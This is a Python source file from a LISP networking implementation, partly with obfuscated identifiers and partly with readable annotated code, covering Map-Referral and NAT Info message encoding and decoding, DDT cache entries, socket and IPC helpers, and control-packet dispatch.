if ( iIiiIi1111ii . cipher_suite == LISP_CS_25519_CHACHA ) :
III = lisp_keys ( 1 , do_poly = True , do_chacha = True )
else :
III = lisp_keys ( 1 , do_poly = False , do_chacha = False )
packet = III . decode_lcaf ( i1o0o0oOO , iIIIi1Iii1 )
if ( packet == None ) : return ( None )
if ( len ( packet ) < 2 ) : return ( None )
i1I1iiiI = struct . unpack ( "H" , packet [ : 2 ] ) [ 0 ]
self . rloc . afi = socket . ntohs ( i1I1iiiI )
if ( len ( packet ) < self . rloc . addr_length ( ) ) : return ( None )
packet = self . rloc . unpack_address ( packet [ 2 : : ] )
if ( packet == None ) : return ( None )
self . rloc . mask_len = self . rloc . host_mask_len ( )
if ( self . rloc . is_null ( ) ) : return ( packet )
OOO00O = self . rloc_name
if ( OOO00O ) : OOO00O = blue ( self . rloc_name , False )
I1 = self . keys [ 1 ] if self . keys else None
if ( I1 == None ) :
if ( III . remote_public_key == None ) :
i1i111III1 = bold ( "No remote encap-public-key supplied" , False )
lprint ( " {} for {}" . format ( i1i111III1 , OOO00O ) )
III = None
else :
i1i111III1 = bold ( "New encap-keying with new state" , False )
lprint ( " {} for {}" . format ( i1i111III1 , OOO00O ) )
III . compute_shared_key ( "encap" )
if ( I1 ) :
if ( III . remote_public_key == None ) :
III = None
oO = bold ( "Remote encap-unkeying occurred" , False )
lprint ( " {} for {}" . format ( oO , OOO00O ) )
elif ( I1 . compare_keys ( III ) ) :
III = I1
lprint ( " Maintain stored encap-keys for {}" . format ( OOO00O ) )
else :
if ( I1 . remote_public_key == None ) :
i1i111III1 = "New encap-keying for existing state"
else :
i1i111III1 = "Remote encap-rekeying"
lprint ( " {} for {}" . format ( bold ( i1i111III1 , False ) ,
OOO00O ) )
I1 . remote_public_key = III . remote_public_key
I1 . compute_shared_key ( "encap" )
III = I1
self . keys = [ None , III , None , None ]
else :
packet = packet [ iIIIi1Iii1 : : ]
return ( packet )
def decode ( self , packet , nonce , ms_json_encrypt = False ) :
iiII1iiI = "BBBBHH"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
self . priority , self . weight , self . mpriority , self . mweight , Ooo0000o , i1I1iiiI = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
Ooo0000o = socket . ntohs ( Ooo0000o )
i1I1iiiI = socket . ntohs ( i1I1iiiI )
self . local_bit = True if ( Ooo0000o & 0x0004 ) else False
self . probe_bit = True if ( Ooo0000o & 0x0002 ) else False
self . reach_bit = True if ( Ooo0000o & 0x0001 ) else False
if ( i1I1iiiI == LISP_AFI_LCAF ) :
packet = packet [ ooo0000oo0 - 2 : : ]
packet = self . decode_lcaf ( packet , nonce , ms_json_encrypt )
else :
self . rloc . afi = i1I1iiiI
packet = packet [ ooo0000oo0 : : ]
packet = self . rloc . unpack_address ( packet )
self . rloc . mask_len = self . rloc . host_mask_len ( )
return ( packet )
def end_of_rlocs ( self , packet , rloc_count ) :
for iIi1iIIIiIiI in range ( rloc_count ) :
packet = self . decode ( packet , None , False )
if ( packet == None ) : return ( None )
return ( packet )
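#
# lisp_map_referral() - the fixed header of a LISP-DDT Map-Referral
# message (RFC 8111, type 6): a record count and the 64-bit nonce
# echoed from the Map-Request being referred.
#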
class lisp_map_referral ( object ) :
def __init__ ( self ) :
self . record_count = 0
self . nonce = 0
def print_map_referral ( self ) :
lprint ( "{} -> record-count: {}, nonce: 0x{}" . format ( bold ( "Map-Referral" , False ) , self . record_count ,
lisp_hex_string ( self . nonce ) ) )
def encode ( self ) :
iIiIii = ( LISP_MAP_REFERRAL << 28 ) | self . record_count
Oo00oo = struct . pack ( "I" , socket . htonl ( iIiIii ) )
Oo00oo += struct . pack ( "Q" , self . nonce )
return ( Oo00oo )
def decode ( self , packet ) :
iiII1iiI = "I"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
iIiIii = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] )
iIiIii = socket . ntohl ( iIiIii [ 0 ] )
self . record_count = iIiIii & 0xff
packet = packet [ ooo0000oo0 : : ]
iiII1iiI = "Q"
ooo0000oo0 = struct . calcsize ( iiII1iiI )
if ( len ( packet ) < ooo0000oo0 ) : return ( None )
self . nonce = struct . unpack ( iiII1iiI , packet [ : ooo0000oo0 ] ) [ 0 ]
packet = packet [ ooo0000oo0 : : ]
return ( packet )
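#
# lisp_ddt_entry() - one entry in the DDT cache: an EID-prefix or (S,G)
# pair together with its delegation set of lisp_ddt_node entries. An
# entry whose delegation set is empty acts as an authoritative-prefix
# marker (see is_auth_prefix() below).
#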
class lisp_ddt_entry ( object ) :
def __init__ ( self ) :
self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . uptime = lisp_get_timestamp ( )
self . delegation_set = [ ]
self . source_cache = None
self . map_referrals_sent = 0
def is_auth_prefix ( self ) :
if ( len ( self . delegation_set ) != 0 ) : return ( False )
if ( self . is_star_g ( ) ) : return ( False )
return ( True )
def is_ms_peer_entry ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( False )
return ( self . delegation_set [ 0 ] . is_ms_peer ( ) )
def print_referral_type ( self ) :
if ( len ( self . delegation_set ) == 0 ) : return ( "unknown" )
o0oO0OO0Oo0 = self . delegation_set [ 0 ]
return ( o0oO0OO0Oo0 . print_node_type ( ) )
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
def add_cache ( self ) :
if ( self . group . is_null ( ) ) :
lisp_ddt_cache . add_cache ( self . eid , self )
else :
o0O0o0OOOoO = lisp_ddt_cache . lookup_cache ( self . group , True )
if ( o0O0o0OOOoO == None ) :
o0O0o0OOOoO = lisp_ddt_entry ( )
o0O0o0OOOoO . eid . copy_address ( self . group )
o0O0o0OOOoO . group . copy_address ( self . group )
lisp_ddt_cache . add_cache ( self . group , o0O0o0OOOoO )
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( o0O0o0OOOoO . group )
o0O0o0OOOoO . add_source_entry ( self )
def add_source_entry ( self , source_ddt ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_ddt . eid , source_ddt )
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
def is_star_g ( self ) :
if ( self . group . is_null ( ) ) : return ( False )
return ( self . eid . is_exact_match ( self . group ) )
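#
# lisp_ddt_node() - one delegated node of a DDT entry: the delegate's
# address and public key, its priority/weight, and whether it is a DDT
# child, a map-server child, or a map-server peer.
#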
class lisp_ddt_node ( object ) :
def __init__ ( self ) :
self . delegate_address = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . public_key = ""
self . map_server_peer = False
self . map_server_child = False
self . priority = 0
self . weight = 0
def print_node_type ( self ) :
if ( self . is_ddt_child ( ) ) : return ( "ddt-child" )
if ( self . is_ms_child ( ) ) : return ( "map-server-child" )
if ( self . is_ms_peer ( ) ) : return ( "map-server-peer" )
def is_ddt_child ( self ) :
if ( self . map_server_child ) : return ( False )
if ( self . map_server_peer ) : return ( False )
return ( True )
def is_ms_child ( self ) :
return ( self . map_server_child )
def is_ms_peer ( self ) :
return ( self . map_server_peer )
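#
# lisp_ddt_map_request() - per-nonce state for a Map-Request that a
# Map-Resolver is walking through the DDT hierarchy. Requests are
# queued in lisp_ddt_map_requestQ keyed by str(nonce) and retransmitted
# every LISP_DDT_MAP_REQUEST_INTERVAL seconds by a threading.Timer
# until an answer arrives or the request is dequeued.
#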
class lisp_ddt_map_request(object):
    def __init__(self, lisp_sockets, packet, eid, group, nonce):
        self.uptime = lisp_get_timestamp()
        self.lisp_sockets = lisp_sockets
        self.packet = packet
        self.eid = eid
        self.group = group
        self.nonce = nonce
        self.mr_source = None
        self.sport = 0
        self.itr = None
        self.retry_count = 0
        self.send_count = 0
        self.retransmit_timer = None
        self.last_request_sent_to = None
        self.from_pitr = False
        self.tried_root = False
        self.last_cached_prefix = [None, None]

    def print_ddt_map_request(self):
        lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format(
            "P" if self.from_pitr else "",
            red(self.itr.print_address(), False),
            green(self.eid.print_address(), False), self.nonce))

    def queue_map_request(self):
        self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
            lisp_retransmit_ddt_map_request, [self])
        self.retransmit_timer.start()
        lisp_ddt_map_requestQ[str(self.nonce)] = self

    def dequeue_map_request(self):
        self.retransmit_timer.cancel()

        # The queue is keyed by the string form of the nonce, so the
        # membership test must use str(self.nonce) as well.
        if (str(self.nonce) in lisp_ddt_map_requestQ):
            lisp_ddt_map_requestQ.pop(str(self.nonce))

    def print_eid_tuple(self):
        return(lisp_print_eid_tuple(self.eid, self.group))

LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH

lisp_map_referral_action_string = [
    "node-referral", "ms-referral", "ms-ack", "ms-not-registered",
    "delegation-hole", "not-authoritative"]

class lisp_info(object):
    def __init__(self):
        self.info_reply = False
        self.nonce = 0
        self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.ms_port = 0
        self.etr_port = 0
        self.rtr_list = []
        self.hostname = lisp_hostname

    def print_info(self):
        if (self.info_reply):
            req_or_reply = "Info-Reply"
            rloc_line = (", ms-port: {}, etr-port: {}, global-rloc: {}, " +
                "ms-rloc: {}, private-rloc: {}, RTR-list: ").format(
                self.ms_port, self.etr_port,
                red(self.global_etr_rloc.print_address_no_iid(), False),
                red(self.global_ms_rloc.print_address_no_iid(), False),
                red(self.private_etr_rloc.print_address_no_iid(), False))
            if (len(self.rtr_list) == 0): rloc_line += "empty, "
            for rtr in self.rtr_list:
                rloc_line += red(rtr.print_address_no_iid(), False) + ", "

            rloc_line = rloc_line[0:-2]
        else:
            req_or_reply = "Info-Request"
            hostname = "<none>" if self.hostname == None else self.hostname
            rloc_line = ", hostname: {}".format(blue(hostname, False))

        lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
            lisp_hex_string(self.nonce), rloc_line))

    def encode(self):
        first_long = (LISP_NAT_INFO << 28)
        if (self.info_reply): first_long |= (1 << 27)

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("Q", self.nonce)
        packet += struct.pack("III", 0, 0, 0)

        #
        # Info-Requests only carry an optional hostname (AFI LISP_AFI_NAME)
        # after the fixed header.
        #
        if (self.info_reply == False):
            if (self.hostname == None):
                packet += struct.pack("H", 0)
            else:
                packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
                packet += (self.hostname + "\0").encode()

            return(packet)

        #
        # Info-Replies carry a NAT-Traversal LCAF with the MS and ETR ports,
        # the global/private ETR RLOCs, the MS RLOC and the RTR list.
        #
        afi = socket.htons(LISP_AFI_LCAF)
        lcaf_type = LISP_LCAF_NAT_TYPE
        lcaf_len = socket.htons(16)
        ms_port = socket.htons(self.ms_port)
        etr_port = socket.htons(self.etr_port)
        packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
            ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
        packet += self.global_etr_rloc.pack_address()
        packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
        packet += self.private_etr_rloc.pack_address()
        if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)

        for rtr in self.rtr_list:
            packet += struct.pack("H", socket.htons(rtr.afi))
            packet += rtr.pack_address()

        return(packet)

    def decode(self, packet):
        orig_packet = packet
        packet_format = "I"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        first_long = struct.unpack(packet_format, packet[:format_size])
        first_long = first_long[0]
        packet = packet[format_size::]

        packet_format = "Q"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        nonce = struct.unpack(packet_format, packet[:format_size])

        first_long = socket.ntohl(first_long)
        self.nonce = nonce[0]
        self.info_reply = first_long & 0x08000000
        self.hostname = None
        packet = packet[format_size::]

        #
        # Skip over key-id/alg-id and require a zero authentication length.
        #
        packet_format = "HH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
        if (auth_len != 0): return(None)

        packet = packet[format_size::]
        packet_format = "IBBH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        ttl, rsvd, mask_len, eid_afi = struct.unpack(packet_format,
            packet[:format_size])

        if (eid_afi != 0): return(None)
        packet = packet[format_size::]

        #
        # Info-Requests may carry a hostname; nothing else follows it.
        #
        if (self.info_reply == False):
            packet_format = "H"
            format_size = struct.calcsize(packet_format)
            if (len(packet) >= format_size):
                afi = struct.unpack(packet_format, packet[:format_size])[0]
                if (socket.ntohs(afi) == LISP_AFI_NAME):
                    packet = packet[format_size::]
                    packet, self.hostname = lisp_decode_dist_name(packet)

            return(orig_packet)

        #
        # Info-Reply: parse the NAT-Traversal LCAF header.
        #
        packet_format = "HHBBHHH"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi, rsvd1, lcaf_type, rsvd2, lcaf_len, ms_port, etr_port = \
            struct.unpack(packet_format, packet[:format_size])

        if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)

        self.ms_port = socket.ntohs(ms_port)
        self.etr_port = socket.ntohs(etr_port)
        packet = packet[format_size::]

        #
        # Parse the global ETR RLOC.
        #
        packet_format = "H"
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_etr_rloc.afi = socket.ntohs(afi)
            packet = self.global_etr_rloc.unpack_address(packet)
            if (packet == None): return(None)
            self.global_etr_rloc.mask_len = \
                self.global_etr_rloc.host_mask_len()

        #
        # Parse the global MS RLOC, if present.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.global_ms_rloc.afi = socket.ntohs(afi)
            packet = self.global_ms_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()

        #
        # Parse the private ETR RLOC, if present.
        #
        if (len(packet) < format_size): return(orig_packet)

        afi = struct.unpack(packet_format, packet[:format_size])[0]
        packet = packet[format_size::]
        if (afi != 0):
            self.private_etr_rloc.afi = socket.ntohs(afi)
            packet = self.private_etr_rloc.unpack_address(packet)
            if (packet == None): return(orig_packet)
            self.private_etr_rloc.mask_len = \
                self.private_etr_rloc.host_mask_len()

        #
        # Parse the RTR list, zero or more RLOC entries.
        #
        while (len(packet) >= format_size):
            afi = struct.unpack(packet_format, packet[:format_size])[0]
            packet = packet[format_size::]
            if (afi == 0): continue
            rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
            packet = rtr.unpack_address(packet)
            if (packet == None): return(orig_packet)
            rtr.mask_len = rtr.host_mask_len()
            self.rtr_list.append(rtr)

        return(orig_packet)

class lisp_nat_info(object):
    def __init__(self, addr_str, hostname, port):
        self.address = addr_str
        self.hostname = hostname
        self.port = port
        self.uptime = lisp_get_timestamp()

    def timed_out(self):
        elapsed = time.time() - self.uptime
        return(elapsed >= (LISP_INFO_INTERVAL * 2))

class lisp_info_source(object):
    def __init__(self, hostname, addr_str, port):
        self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
        self.port = port
        self.uptime = lisp_get_timestamp()
        self.nonce = None
        self.hostname = hostname
        self.no_timeout = False

    def cache_address_for_info_source(self):
        key = self.address.print_address_no_iid() + self.hostname
        lisp_info_sources_by_address[key] = self

    def cache_nonce_for_info_source(self, nonce):
        self.nonce = nonce
        lisp_info_sources_by_nonce[nonce] = self

def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
    #
    # On little-endian x86, the 64-bit words (and the one 32-bit word for
    # SHA1-96) unpacked from the packet need byte-swapping before they are
    # concatenated.
    #
    if (lisp_is_x86()):
        if (auth1 != ""): auth1 = byte_swap_64(auth1)
        if (auth2 != ""): auth2 = byte_swap_64(auth2)
        if (auth3 != ""):
            if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
            else: auth3 = byte_swap_64(auth3)
        if (auth4 != ""): auth4 = byte_swap_64(auth4)

    if (alg_id == LISP_SHA_1_96_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(8)
        auth_data = auth1 + auth2 + auth3

    if (alg_id == LISP_SHA_256_128_ALG_ID):
        auth1 = lisp_hex_string(auth1)
        auth1 = auth1.zfill(16)
        auth2 = lisp_hex_string(auth2)
        auth2 = auth2.zfill(16)
        auth3 = lisp_hex_string(auth3)
        auth3 = auth3.zfill(16)
        auth4 = lisp_hex_string(auth4)
        auth4 = auth4.zfill(16)
        auth_data = auth1 + auth2 + auth3 + auth4

    return(auth_data)

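#
# Illustrative note (not in the original source): ignoring the x86
# byte-swap step, each word is zero-filled hex, so for SHA1-96 the result
# is always 16 + 16 + 8 = 40 hex digits, e.g. (assuming lisp_hex_string()
# returns the bare hex digits):
#
#   lisp_concat_auth_data(LISP_SHA_1_96_ALG_ID, 0x12, 0x34, 0x56, "")
#     == "0000000000000012" + "0000000000000034" + "00000056"
#
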
def lisp_open_listen_socket(local_addr, port):
    if (port.isdigit()):
        if (local_addr.find(".") != -1):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (local_addr.find(":") != -1):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)

        sock.bind((local_addr, int(port)))
    else:
        #
        # A non-numeric "port" names an internal AF_UNIX datagram socket.
        #
        name = port
        if (os.path.exists(name)):
            os.system("rm " + name)
            time.sleep(1)

        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(name)

    return(sock)

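#
# Illustrative usage sketch (not in the original source): a numeric port
# string opens a UDP listener, any other string is taken as the path of an
# internal AF_UNIX datagram socket, e.g.:
#
#   lisp_open_listen_socket("0.0.0.0", "4342")   # LISP control-plane UDP
#   lisp_open_listen_socket("", "lisp-itr")      # internal IPC socket
#
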
def lisp_open_send_socket(internal_name, afi):
    if (internal_name == ""):
        if (afi == LISP_AFI_IPV4):
            sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        if (afi == LISP_AFI_IPV6):
            if (lisp_is_raspbian()): return(None)
            sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
    else:
        if (os.path.exists(internal_name)): os.system("rm " + internal_name)
        sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
        sock.bind(internal_name)

    return(sock)

def lisp_close_socket(sock, internal_name):
    sock.close()
    if (os.path.exists(internal_name)): os.system("rm " + internal_name)
    return

def lisp_is_running(node):
    # Each running LISP component binds an AF_UNIX socket named after it,
    # so the node is up exactly when that path exists.
    return(True if (os.path.exists(node)) else False)

def lisp_packet_ipc(packet, source, sport):
    ipc = "packet@{}@{}@{}@".format(str(len(packet)), source, str(sport))
    return(ipc.encode() + packet)

def lisp_control_packet_ipc(packet, source, dest, dport):
    ipc = "control-packet@{}@{}@".format(dest, str(dport))
    return(ipc.encode() + packet)

def lisp_data_packet_ipc(packet, source):
    ipc = "data-packet@{}@{}@@".format(str(len(packet)), source)
    return(ipc.encode() + packet)

def lisp_command_ipc(ipc, source):
    packet = "command@{}@{}@@".format(len(ipc), source) + ipc
    return(packet.encode())

def lisp_api_ipc(source, data):
    packet = "api@" + str(len(data)) + "@" + source + "@@" + data
    return(packet.encode())

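#
# Illustrative sketch (not part of the original source): the builders above
# all frame IPC messages as a "type@length@source@port@" text header in
# front of the payload ("control-packet" carries dest/dport instead of
# length/source). The hypothetical helper below shows how a "packet@..."
# message can be taken apart; only the first four "@"s are header
# separators, since the payload may itself contain "@" bytes.
#
def _example_parse_packet_ipc(message):
    opcode, length, source, sport, payload = message.split(b"@", 4)
    return([opcode.decode(), int(length.decode()), source.decode(),
        sport.decode(), payload])
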
def lisp_ipc(packet, send_socket, node):
    #
    # Don't send if the destination component isn't running.
    #
    if (lisp_is_running(node) == False):
        lprint("Suppress sending IPC to {}".format(node))
        return

    # Control messages are segmented at 9000 bytes, everything else at 1500.
    seg_size = 1500 if (packet.find(b"control-packet") == -1) else 9000

    offset = 0
    length = len(packet)
    retry_count = 0
    sleep_time = .001
    while (length > 0):
        segment_len = min(length, seg_size)
        segment = packet[offset:segment_len + offset]

        try:
            if (type(segment) == str): segment = segment.encode()
            send_socket.sendto(segment, node)
            lprint("Send IPC {}-out-of-{} byte to {} succeeded".format(
                len(segment), len(packet), node))

            retry_count = 0
            sleep_time = .001

        except socket.error as e:
            if (retry_count == 12):
                lprint("Giving up on {}, consider it down".format(node))
                break

            lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format(
                len(segment), len(packet), node, e))

            retry_count += 1
            time.sleep(sleep_time)

            lprint("Retrying after {} ms ...".format(sleep_time * 1000))
            sleep_time *= 2
            continue

        offset += segment_len
        length -= segment_len

    return

def lisp_format_packet(packet):
    # Hexlify the packet and insert a space after every 8 hex digits.
    packet = binascii.hexlify(packet)
    offset = 0
    new_packet = b""
    length = len(packet) * 2
    while (offset < length):
        new_packet += packet[offset:offset + 8] + b" "
        offset += 8
        length -= 4

    return(new_packet.decode())

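#
# Illustrative example (not in the original source): the dump is grouped
# 8 hex digits at a time, so lisp_format_packet(b"\x12\x34\x56\x78\x9a")
# returns "12345678 9a " (with a trailing separator).
#
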
def lisp_send(lisp_sockets, dest, port, packet):
    send_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]

    #
    # If the destination is an IPv4-mapped IPv6 address (::ffff:a.b.c.d),
    # prefer the IPv4 socket; fall back to it with the embedded IPv4
    # address when no IPv6 socket is open.
    #
    addr_str = dest.print_address_no_iid()
    if (addr_str.find("::ffff:") != -1 and addr_str.count(".") == 3):
        if (lisp_i_am_rtr): send_socket = lisp_sockets[0]
        if (send_socket == None):
            send_socket = lisp_sockets[0]
            addr_str = addr_str.split("::ffff:")[-1]

    lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
        len(packet), bold("to " + addr_str, False), port,
        lisp_format_packet(packet)))

    #
    # For RLOC-probe Map-Requests (0x12) and Map-Replies (0x28), set the
    # socket TTL to LISP_RLOC_PROBE_TTL so probes measure the real path.
    #
    set_ttl = (LISP_RLOC_PROBE_TTL == 128)
    if (set_ttl):
        lisp_type = struct.unpack("B", packet[0:1])[0]
        set_ttl = (lisp_type in [0x12, 0x28])
        if (set_ttl): lisp_set_ttl(send_socket, LISP_RLOC_PROBE_TTL)

    try: send_socket.sendto(packet, (addr_str, port))
    except socket.error as e:
        lprint("socket.sendto() failed: {}".format(e))

    #
    # Restore the default TTL if it was changed for an RLOC-probe.
    #
    if (set_ttl): lisp_set_ttl(send_socket, 64)
    return

def lisp_receive_segments(lisp_socket, packet, source, total_length):
    #
    # If the first segment carried the entire message, we are done.
    #
    segment_len = total_length - len(packet)
    if (segment_len == 0): return([True, packet])

    lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
        total_length, source))

    #
    # Keep reading segments until the advertised total length is reached.
    #
    length = segment_len
    while (length > 0):
        try: segment = lisp_socket.recvfrom(9000)
        except: return([False, None])

        segment = segment[0]

        #
        # If a new message header shows up mid-reassembly, the sender gave
        # up on the old message; discard what we have so far.
        #
        seg = segment.decode()
        if (seg.find("packet@") == 0):
            seg = seg.split("@")
            lprint("Received new message ({}-out-of-{}) while receiving " + \
                "fragments, old message discarded", len(segment),
                seg[1] if len(seg) > 2 else "?")
            return([False, segment])

        length -= len(segment)
        packet += segment

        lprint("Received {}-out-of-{} byte segment from {}".format(
            len(segment), total_length, source))

    return([True, packet])

def lisp_bit_stuff(payload):
    #
    # The payload was split on 0x40 ("@") bytes that belong to the payload
    # itself; rejoin the segments with the 0x40 byte restored, dropping the
    # final separator.
    #
    lprint("Bit-stuffing, found {} segments".format(len(payload)))
    packet = b""
    for segment in payload: packet += segment + b"\x40"
    return(packet[:-1])

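#
# Illustrative example (not in the original source): the segments passed
# in are the results of splitting on 0x40 ("@"), so the separator is
# restored between them: lisp_bit_stuff([b"ab", b"cd"]) == b"ab@cd".
#
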
def lisp_receive(lisp_socket, internal):
    while (True):
        #
        # Read from socket. An exception means the socket was closed.
        #
        try: data_source = lisp_socket.recvfrom(9000)
        except: return(["", "", "", ""])

        #
        # External sockets carry raw LISP control/data packets.
        #
        if (internal == False):
            packet = data_source[0]
            source = lisp_convert_6to4(data_source[1][0])
            port = data_source[1][1]

            if (port == LISP_DATA_PORT):
                do_log = lisp_data_plane_logging
                packet_str = lisp_format_packet(packet[0:60]) + " ..."
            else:
                do_log = True
                packet_str = lisp_format_packet(packet)

            if (do_log):
                lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
                    False), len(packet), bold("from " + source, False), port,
                    packet_str))

            return(["packet", source, port, packet])

        #
        # Internal sockets carry "type@length@source@port@payload" IPC
        # messages, possibly segmented and bit-stuffed.
        #
        all_segments = False
        message = data_source[0]
        if (type(message) == str): message = message.encode()
        run_loop_again = False

        while (all_segments == False):
            message = message.split(b"@")

            if (len(message) < 4):
                lprint("Possible fragment (length {}), from old message, " + \
                    "discarding", len(message[0]))
                run_loop_again = True
                break

            opcode = message[0].decode()
            try:
                total_length = int(message[1])
            except:
                error_str = bold("Internal packet reassembly error", False)
                lprint("{}: {}".format(error_str, data_source))
                run_loop_again = True
                break

            source = message[2].decode()
            port = message[3].decode()

            #
            # If the payload itself contained "@" bytes, the split produced
            # extra segments; bit-stuff them back together.
            #
            if (len(message) > 5):
                packet = lisp_bit_stuff(message[4::])
            else:
                packet = message[4]

            #
            # Pull in any remaining segments of a multi-segment message.
            #
            all_segments, packet = lisp_receive_segments(lisp_socket, packet,
                source, total_length)
            if (packet == None): return(["", "", "", ""])

            #
            # A new message preempted reassembly; start over with it.
            #
            if (all_segments == False):
                message = packet
                continue

            if (port == ""): port = "no-port"
            if (opcode == "command" and lisp_i_am_core == False):
                index = packet.find(b" {")
                command = packet if index == -1 else packet[:index]
                command = ": '" + command.decode() + "'"
            else:
                command = ""

            lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
                len(packet), bold("from " + source, False), port, opcode,
                command if (opcode in ["command", "api"]) else ": ... " if \
                (opcode == "data-packet") else ": " + \
                lisp_format_packet(packet)))

        if (run_loop_again): continue
        return([opcode, source, port, packet])

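#
# Illustrative note (not in the original source): callers of lisp_receive()
# always get a 4-element list [opcode, source, port, packet]; an external
# socket read returns ["packet", <source-rloc>, <udp-port>, <raw-bytes>],
# and a closed socket returns ["", "", "", ""].
#
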
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
    trigger_flag = False
    timestamp = time.time()

    header = lisp_control_header()
    if (header.decode(packet) == None):
        lprint("Could not decode control header")
        return(trigger_flag)

    #
    # The source may arrive as a string; convert it to a lisp_address
    # unless it names an internal "lisp-*" component.
    #
    from_component = source
    if (source.find("lisp") == -1):
        addr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        addr.string_to_afi(source)
        addr.store_address(source)
        source = addr

    if (header.type == LISP_MAP_REQUEST):
        lisp_process_map_request(lisp_sockets, packet, None, 0, source,
            udp_sport, False, ttl, timestamp)

    elif (header.type == LISP_MAP_REPLY):
        lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)

    elif (header.type == LISP_MAP_REGISTER):
        lisp_process_map_register(lisp_sockets, packet, source, udp_sport)

    elif (header.type == LISP_MAP_NOTIFY):
        if (from_component == "lisp-etr"):
            lisp_process_multicast_map_notify(packet, source)
        elif (lisp_is_running("lisp-rtr")):
            lisp_process_multicast_map_notify(packet, source)
        elif (lisp_is_running("lisp-itr")):
            lisp_process_unicast_map_notify(lisp_sockets, packet, source)

    elif (header.type == LISP_MAP_NOTIFY_ACK):
        lisp_process_map_notify_ack(packet, source)

    elif (header.type == LISP_MAP_REFERRAL):
        lisp_process_map_referral(lisp_sockets, packet, source)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
        x, y, trigger_flag = lisp_process_info_reply(source, packet, True)

    elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
        addr_str = source.print_address_no_iid()
        lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
            None)

    elif (header.type == LISP_ECM):
        lisp_process_ecm(lisp_sockets, packet, source, udp_sport)

    else:
        lprint("Invalid LISP control packet type {}".format(header.type))

    return(trigger_flag)

def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
    ttl, timestamp):

    probe = bold("RLOC-probe", False)

    if (lisp_i_am_etr):
        lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(
            probe))
        lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
            ttl, timestamp)
        return

    if (lisp_i_am_rtr):
